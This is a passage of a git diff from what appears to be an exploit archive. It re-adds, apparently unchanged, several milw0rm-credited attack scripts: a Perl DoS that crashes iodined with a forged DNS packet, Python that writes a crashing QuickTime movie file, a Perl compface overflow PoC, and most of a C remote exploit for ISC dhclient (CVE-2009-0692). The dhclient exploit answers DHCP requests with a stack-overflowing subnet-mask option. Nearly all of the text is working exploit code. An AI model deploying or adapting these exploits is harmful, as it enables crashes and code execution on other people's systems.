$pkt_header); -my @chunk = split(/\./, $domain); - -foreach (@chunk) { - $l = length $_; - $template = $template . 'Ca'. $l; - push(@pkt, $l); - push(@pkt, $_); -} -$template = $template . 'a16'; -push(@pkt, $pkt_footer); - -$| = 1; -print " [*] Shooting iodined at host $host...\n"; - -my $sock = IO::Socket::INET->new( Proto => 'udp', - PeerPort => 53, - PeerAddr => $host) or die "Creating socket: $!\n"; - -$sock->send(pack($template, @pkt)) or die "send: $!"; - -print " [*] If the domain was ok, now the service is down.\n"; - -# milw0rm.com [2009-04-27] +#!/usr/bin/perl + +# iodined <= 0.4.2 DoS exploit +# +# by Albert Sellares +# http://www.wekk.net +# 2009-04-26 +# +# This exploit shuts down the iodined daemon using a forged DNS packet. +# It works on the last debian stable version (0.4.2-2). +# +# It produces a segmentation fault on the daemon side. + +use IO::Socket; +use strict; + +my $pkt_header = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x0b\x56\x63\x61\x61\x61\x69\x61\x71\x61\x61\x64"; +my $pkt_footer = "\x00\x00\x0a\x00\x01\x00\x00\x29\x10\x00\x00\x00\x80\x00\x00\x00"; + +if ($#ARGV != 1) { + print "shoot-iodined <= 0.4.2 - \n". + "=============================================\n". + "Usage: ./shoot-iodined host domain\n". + " * host: Host addr where iodined is listening\n". + " * domain: Domain that iodined is using\n"; + exit 1; +} + +my $host = $ARGV[0]; +my $domain = $ARGV[1]; +my $template = 'a24'; +my @pkt;; +my $l; + +push(@pkt, $pkt_header); +my @chunk = split(/\./, $domain); + +foreach (@chunk) { + $l = length $_; + $template = $template . 'Ca'. $l; + push(@pkt, $l); + push(@pkt, $_); +} +$template = $template . 'a16'; +push(@pkt, $pkt_footer); + +$| = 1; +print " [*] Shooting iodined at host $host...\n"; + +my $sock = IO::Socket::INET->new( Proto => 'udp', + PeerPort => 53, + PeerAddr => $host) or die "Creating socket: $!\n"; + +$sock->send(pack($template, @pkt)) or die "send: $!"; + +print " [*] If the domain was ok, now the service is down.\n"; + +# milw0rm.com [2009-04-27] diff --git a/platforms/linux/dos/8960.py b/platforms/linux/dos/8960.py index 209d402cd..8edbb7bd4 100755 --- a/platforms/linux/dos/8960.py +++ b/platforms/linux/dos/8960.py @@ -1,80 +1,80 @@ -#0:000> !exploitable -v -#HostMachine\HostUser -#Executing Processor Architecture is x86 -#Debuggee is in User Mode -#Debuggee is a live user mode debugging session on the local machine -#Event Type: Exception -#Exception Faulting Address: 0x66830f9b -#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) -# -#Faulting Instruction:66830f9b push ebx -# -#Basic Block: -# 66830f9b push ebx -# Tainted Input Operands: ebx -# 66830f9c push ebp -# 66830f9d mov ebp,dword ptr +0x41f (00000420)[esp] -# 66830fa4 push esi -# 66830fa5 push edi -# 66830fa6 mov edi,ecx -# 66830fa8 cmp edi,offset +0x5ff (00000600) -# 66830fae mov ebx,edx -# 66830fb0 mov dword ptr [esp+14h],eax -# 66830fb4 mov byte ptr [esp+10h],0 -# 66830fb9 mov byte ptr [esp+11h],0 -# 66830fbe mov byte ptr [esp+12h],0 -# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) -# -#Exception Hash (Major/Minor): 0x614b6671.0x614b786e -# -#Stack Trace: -#QuickTime!DllMain+0x2fabb -#+0x1231137 -#Instruction Address: 0x66830f9b -# -#Description: Stack Overflow -#Short Description: StackOverflow -#Exploitability Classification: UNKNOWN -#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) - -print "------------------------------" -print "w3bd3vil [at] gmail [dot] com" -print "Apple QuickTime CRGN Atom 0day" -print "------------------------------" -bytes = [ -0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, -0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, -0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, -0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, -0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, -0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, -0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, -0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, -0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, -0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, -0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, -0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, -0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, -0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, -0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, -0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] - -f = open("webDEViL.mov", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print "webDEViL.mov created! (%d bytes)" % len(bytes) - -# milw0rm.com [2009-06-15] +#0:000> !exploitable -v +#HostMachine\HostUser +#Executing Processor Architecture is x86 +#Debuggee is in User Mode +#Debuggee is a live user mode debugging session on the local machine +#Event Type: Exception +#Exception Faulting Address: 0x66830f9b +#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) +# +#Faulting Instruction:66830f9b push ebx +# +#Basic Block: +# 66830f9b push ebx +# Tainted Input Operands: ebx +# 66830f9c push ebp +# 66830f9d mov ebp,dword ptr +0x41f (00000420)[esp] +# 66830fa4 push esi +# 66830fa5 push edi +# 66830fa6 mov edi,ecx +# 66830fa8 cmp edi,offset +0x5ff (00000600) +# 66830fae mov ebx,edx +# 66830fb0 mov dword ptr [esp+14h],eax +# 66830fb4 mov byte ptr [esp+10h],0 +# 66830fb9 mov byte ptr [esp+11h],0 +# 66830fbe mov byte ptr [esp+12h],0 +# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) +# +#Exception Hash (Major/Minor): 0x614b6671.0x614b786e +# +#Stack Trace: +#QuickTime!DllMain+0x2fabb +#+0x1231137 +#Instruction Address: 0x66830f9b +# +#Description: Stack Overflow +#Short Description: StackOverflow +#Exploitability Classification: UNKNOWN +#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) + +print "------------------------------" +print "w3bd3vil [at] gmail [dot] com" +print "Apple QuickTime CRGN Atom 0day" +print "------------------------------" +bytes = [ +0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, +0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, +0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, +0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, +0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, +0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, +0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, +0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, +0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, +0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, +0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, +0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, +0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, +0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, +0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, +0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] + +f = open("webDEViL.mov", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print "webDEViL.mov created! (%d bytes)" % len(bytes) + +# milw0rm.com [2009-06-15] diff --git a/platforms/linux/dos/8982.txt b/platforms/linux/dos/8982.txt index 3fc9badd0..7d505081c 100755 --- a/platforms/linux/dos/8982.txt +++ b/platforms/linux/dos/8982.txt @@ -1,20 +1,20 @@ -#!/usr/bin/perl -######################################################################### -####VIVA#ISLAM##################################################ALLAH#### -######################################################################### -# compface <= 1.5.2 bufer overflow p o c -# vuln only excist on debian and ubuntu? - packages.debian.org/compface - -# author: metalhoney ------- metalhoney1@hotmail.com ------- -######################################################################### -open(ISLAM,">allah.xbm") or die; -print ISLAM "#define noname_width 48\n#define noname_height 48\n"; -print ISLAM "static "; -print ISLAM "A"x184; -print ISLAM " char = {\n"; -close(ISLAM) or die; -print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n"; -######################################################################### -####VIVA#ISLAM##################################################ALLAH#### -######################################################################### - -# milw0rm.com [2009-06-17] +#!/usr/bin/perl +######################################################################### +####VIVA#ISLAM##################################################ALLAH#### +######################################################################### +# compface <= 1.5.2 bufer overflow p o c +# vuln only excist on debian and ubuntu? - packages.debian.org/compface - +# author: metalhoney ------- metalhoney1@hotmail.com ------- +######################################################################### +open(ISLAM,">allah.xbm") or die; +print ISLAM "#define noname_width 48\n#define noname_height 48\n"; +print ISLAM "static "; +print ISLAM "A"x184; +print ISLAM " char = {\n"; +close(ISLAM) or die; +print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n"; +######################################################################### +####VIVA#ISLAM##################################################ALLAH#### +######################################################################### + +# milw0rm.com [2009-06-17] diff --git a/platforms/linux/dos/904.c b/platforms/linux/dos/904.c index e29272686..ba8bf1982 100755 --- a/platforms/linux/dos/904.c +++ b/platforms/linux/dos/904.c @@ -82,6 +82,6 @@ perror("read"); printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,buf2); while(42); return 42; -} - -// milw0rm.com [2005-03-29] +} + +// milw0rm.com [2005-03-29] diff --git a/platforms/linux/dos/911.c b/platforms/linux/dos/911.c index 69d86ef96..16198b11e 100755 --- a/platforms/linux/dos/911.c +++ b/platforms/linux/dos/911.c @@ -101,6 +101,6 @@ close(fd); printf("This will panic on ppc64\n"); return err; -} - -// milw0rm.com [2005-04-04] +} + +// milw0rm.com [2005-04-04] diff --git a/platforms/linux/dos/9265.c b/platforms/linux/dos/9265.c index d4e722842..f561b377b 100755 --- a/platforms/linux/dos/9265.c +++ b/platforms/linux/dos/9265.c @@ -1,308 +1,308 @@ -/* - * cve-2009-0692.c - * - * ISC DHCP dhclient < 3.1.2p1 Remote Exploit - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 - * - * Stack-based buffer overflow in the script_write_params method in - * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before - * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to - * execute arbitrary code via a crafted subnet-mask option. - * - * Usage: - * - * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet - * $ sudo ./cve-2009-0692 - * [+] listening on eth0: ip and udp and src port 68 and dst port 67 - * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 - * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 - * - * $ gdb /sbin/dhclient - * ... - * DHCPREQUEST on eth0 to 255.255.255.255 port 67 - * DHCPACK from 0.6.9.2 - * ... - * Program received signal SIGSEGV, Segmentation fault. - * 0x41414141 in ?? () - * - * Notes: - * - * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free - * to tweak for your target platform. Depends on libdnet and libpcap. - * - * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the - * stack during our overflow. After a successful return from the vulnerable - * script_write_params function, EIP will be set to JMP_TARGET. - * - * Exclusively for use at DEFCON next week. ;-) - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */ -#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */ -#define JMP_TARGET "\x41\x41\x41\x41" - -#define BPF_FILTER "ip and udp and src port 68 and dst port 67" -#define PKT_BUFSIZ 1514 -#define DHCP_OP_REQUEST 1 -#define DHCP_OP_REPLY 2 -#define DHCP_TYPE_REQUEST 3 -#define DHCP_TYPE_ACK 5 -#define DHCP_OPT_REQIP 50 -#define DHCP_OPT_MSGTYPE 53 -#define DHCP_OPT_END 255 -#define DHCP_CHADDR_LEN 16 -#define SERVERNAME_LEN 64 -#define BOOTFILE_LEN 128 -#define DHCP_HDR_LEN 240 -#define DHCP_OPT_HDR_LEN 2 - -#ifndef __GNUC__ -# define __attribute__(x) -# pragma pack(1) -#endif - -struct dhcp_hdr { - uint8_t op; - uint8_t hwtype; - uint8_t hwlen; - uint8_t hwopcount; - uint32_t xid; - uint16_t secs; - uint16_t flags; - uint32_t ciaddr; - uint32_t yiaddr; - uint32_t siaddr; - uint32_t giaddr; - uint8_t chaddr[DHCP_CHADDR_LEN]; - uint8_t servername[SERVERNAME_LEN]; - uint8_t bootfile[BOOTFILE_LEN]; - uint32_t cookie; -} __attribute__((__packed__)); - -struct dhcp_opt { - uint8_t opt; - uint8_t len; -} __attribute__((__packed__)); - -#ifndef __GNUC__ -# pragma pack() -#endif - -void -process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) -{ - eth_t *raw; - struct ip_hdr *ip_h; - struct eth_hdr *eth_h; - struct udp_hdr *udp_h; - struct dhcp_hdr *dhcp_h; - struct dhcp_opt *dhcp_opt; - char *dev = data, *ptr; - char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; - int opt_len, clen = pkthdr->caplen; - uint8_t msg_type = 0, payload_len = 0; - uint32_t yiaddr = 0; - - /* packet too short */ - if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { - return; - } - - eth_h = (struct eth_hdr *) pkt; - ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); - udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); - dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN); - dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); - - /* only care about REQUEST opcodes */ - if (dhcp_h->op != DHCP_OP_REQUEST) { - return; - } - - /* parse DHCP options */ - while (1) { - if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { - if (dhcp_opt->len != 1) { - return; - } - memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); - } - if (dhcp_opt->opt == DHCP_OPT_REQIP) { - if (dhcp_opt->len != 4) { - return; - } - memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); - } - if (dhcp_opt->opt == DHCP_OPT_END) { - break; - } - if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { - break; - } - dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); - } - - /* only care about REQUEST msg types */ - if (msg_type != DHCP_TYPE_REQUEST) { - return; - } - - printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); - printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); - - /* construct stack payload */ - memset(payload, 0, sizeof(payload)); - ptr = payload; - memset(ptr, 0, 16); - ptr += 16; - memcpy(ptr, READABLE_1, 4); - ptr += 4; - memcpy(ptr, READABLE_2, 4); - ptr += 4; - memset(ptr, 0, 8); - ptr += 8; - memcpy(ptr, "\x04\x00\x00\x00", 4); - ptr += 4; - memset(ptr, 0, 28); - ptr += 28; - memcpy(ptr, JMP_TARGET, 4); - ptr += 4; - payload_len = ptr - payload; - - /* dhcp header */ - dhcp_h->op = DHCP_OP_REPLY; - memcpy(&dhcp_h->yiaddr, &yiaddr, 4); - - /* normal dhcp options */ - memset(options, 0, sizeof(options)); - ptr = options; - memcpy(ptr, "\x35\x01\x05", 3); - ptr += 3; - memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6); - ptr += 6; - memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6); - ptr += 6; - memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6); - ptr += 6; - memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6); - ptr += 6; - - /* malicious subnet mask option */ - memcpy(ptr, "\x01", 1); - ptr += 1; - memcpy(ptr, &payload_len, 1); - ptr += 1; - memcpy(ptr, payload, payload_len); - ptr += payload_len; - - memcpy(ptr, "\xff", 1); - ptr += 1; - opt_len = ptr - options; - - /* construct full packet payload */ - memset(pktbuf, 0, sizeof(pktbuf)); - ptr = pktbuf; - - eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP); - ptr += ETH_HDR_LEN; - - ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); - ptr += IP_HDR_LEN; - - udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - ptr += UDP_HDR_LEN; - - memcpy(ptr, dhcp_h, DHCP_HDR_LEN); - ptr += DHCP_HDR_LEN; - - memcpy(ptr, options, opt_len); - ptr += opt_len; - - ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - - /* fire off malicious response */ - raw = eth_open(dev); - if (!raw) { - fprintf(stderr, "[-] error opening raw socket on %s\n", dev); - exit(1); - } - eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - eth_close(raw); -} - -void -usage(char **argv) -{ - fprintf(stderr, "usage: %s [-i interface]\n", argv[0]); - exit(1); -} - -int -main(int argc, char **argv) -{ - int ch, ret; - char *dev = NULL; - char errbuf[PCAP_ERRBUF_SIZE]; - struct bpf_program bfp; - pcap_t *ph; - - opterr = 0; - - while ((ch = getopt(argc, argv, "i:")) != -1) { - switch (ch) { - case 'i': - dev = optarg; - break; - default: - usage(argv); - } - } - - if (!dev) { - dev = pcap_lookupdev(errbuf); - if (!dev) { - fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf); - exit(1); - } - } - - ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); - if (!ph) { - fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf); - exit(1); - } - - ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); - if (ret == -1) { - fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph)); - exit(1); - } - - pcap_setfilter(ph, &bfp); - if (ret == -1) { - fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph)); - exit(1); - } - - printf("[+] listening on %s: %s\n", dev, BPF_FILTER); - - pcap_loop(ph, -1, process, dev); - - return 0; -} - -// milw0rm.com [2009-07-27] +/* + * cve-2009-0692.c + * + * ISC DHCP dhclient < 3.1.2p1 Remote Exploit + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 + * + * Stack-based buffer overflow in the script_write_params method in + * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before + * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to + * execute arbitrary code via a crafted subnet-mask option. + * + * Usage: + * + * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet + * $ sudo ./cve-2009-0692 + * [+] listening on eth0: ip and udp and src port 68 and dst port 67 + * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 + * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 + * + * $ gdb /sbin/dhclient + * ... + * DHCPREQUEST on eth0 to 255.255.255.255 port 67 + * DHCPACK from 0.6.9.2 + * ... + * Program received signal SIGSEGV, Segmentation fault. + * 0x41414141 in ?? () + * + * Notes: + * + * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free + * to tweak for your target platform. Depends on libdnet and libpcap. + * + * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the + * stack during our overflow. After a successful return from the vulnerable + * script_write_params function, EIP will be set to JMP_TARGET. + * + * Exclusively for use at DEFCON next week. ;-) + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */ +#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */ +#define JMP_TARGET "\x41\x41\x41\x41" + +#define BPF_FILTER "ip and udp and src port 68 and dst port 67" +#define PKT_BUFSIZ 1514 +#define DHCP_OP_REQUEST 1 +#define DHCP_OP_REPLY 2 +#define DHCP_TYPE_REQUEST 3 +#define DHCP_TYPE_ACK 5 +#define DHCP_OPT_REQIP 50 +#define DHCP_OPT_MSGTYPE 53 +#define DHCP_OPT_END 255 +#define DHCP_CHADDR_LEN 16 +#define SERVERNAME_LEN 64 +#define BOOTFILE_LEN 128 +#define DHCP_HDR_LEN 240 +#define DHCP_OPT_HDR_LEN 2 + +#ifndef __GNUC__ +# define __attribute__(x) +# pragma pack(1) +#endif + +struct dhcp_hdr { + uint8_t op; + uint8_t hwtype; + uint8_t hwlen; + uint8_t hwopcount; + uint32_t xid; + uint16_t secs; + uint16_t flags; + uint32_t ciaddr; + uint32_t yiaddr; + uint32_t siaddr; + uint32_t giaddr; + uint8_t chaddr[DHCP_CHADDR_LEN]; + uint8_t servername[SERVERNAME_LEN]; + uint8_t bootfile[BOOTFILE_LEN]; + uint32_t cookie; +} __attribute__((__packed__)); + +struct dhcp_opt { + uint8_t opt; + uint8_t len; +} __attribute__((__packed__)); + +#ifndef __GNUC__ +# pragma pack() +#endif + +void +process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) +{ + eth_t *raw; + struct ip_hdr *ip_h; + struct eth_hdr *eth_h; + struct udp_hdr *udp_h; + struct dhcp_hdr *dhcp_h; + struct dhcp_opt *dhcp_opt; + char *dev = data, *ptr; + char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; + int opt_len, clen = pkthdr->caplen; + uint8_t msg_type = 0, payload_len = 0; + uint32_t yiaddr = 0; + + /* packet too short */ + if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { + return; + } + + eth_h = (struct eth_hdr *) pkt; + ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); + udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); + dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN); + dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); + + /* only care about REQUEST opcodes */ + if (dhcp_h->op != DHCP_OP_REQUEST) { + return; + } + + /* parse DHCP options */ + while (1) { + if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { + if (dhcp_opt->len != 1) { + return; + } + memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); + } + if (dhcp_opt->opt == DHCP_OPT_REQIP) { + if (dhcp_opt->len != 4) { + return; + } + memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); + } + if (dhcp_opt->opt == DHCP_OPT_END) { + break; + } + if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { + break; + } + dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); + } + + /* only care about REQUEST msg types */ + if (msg_type != DHCP_TYPE_REQUEST) { + return; + } + + printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); + printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); + + /* construct stack payload */ + memset(payload, 0, sizeof(payload)); + ptr = payload; + memset(ptr, 0, 16); + ptr += 16; + memcpy(ptr, READABLE_1, 4); + ptr += 4; + memcpy(ptr, READABLE_2, 4); + ptr += 4; + memset(ptr, 0, 8); + ptr += 8; + memcpy(ptr, "\x04\x00\x00\x00", 4); + ptr += 4; + memset(ptr, 0, 28); + ptr += 28; + memcpy(ptr, JMP_TARGET, 4); + ptr += 4; + payload_len = ptr - payload; + + /* dhcp header */ + dhcp_h->op = DHCP_OP_REPLY; + memcpy(&dhcp_h->yiaddr, &yiaddr, 4); + + /* normal dhcp options */ + memset(options, 0, sizeof(options)); + ptr = options; + memcpy(ptr, "\x35\x01\x05", 3); + ptr += 3; + memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6); + ptr += 6; + memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6); + ptr += 6; + memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6); + ptr += 6; + memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6); + ptr += 6; + + /* malicious subnet mask option */ + memcpy(ptr, "\x01", 1); + ptr += 1; + memcpy(ptr, &payload_len, 1); + ptr += 1; + memcpy(ptr, 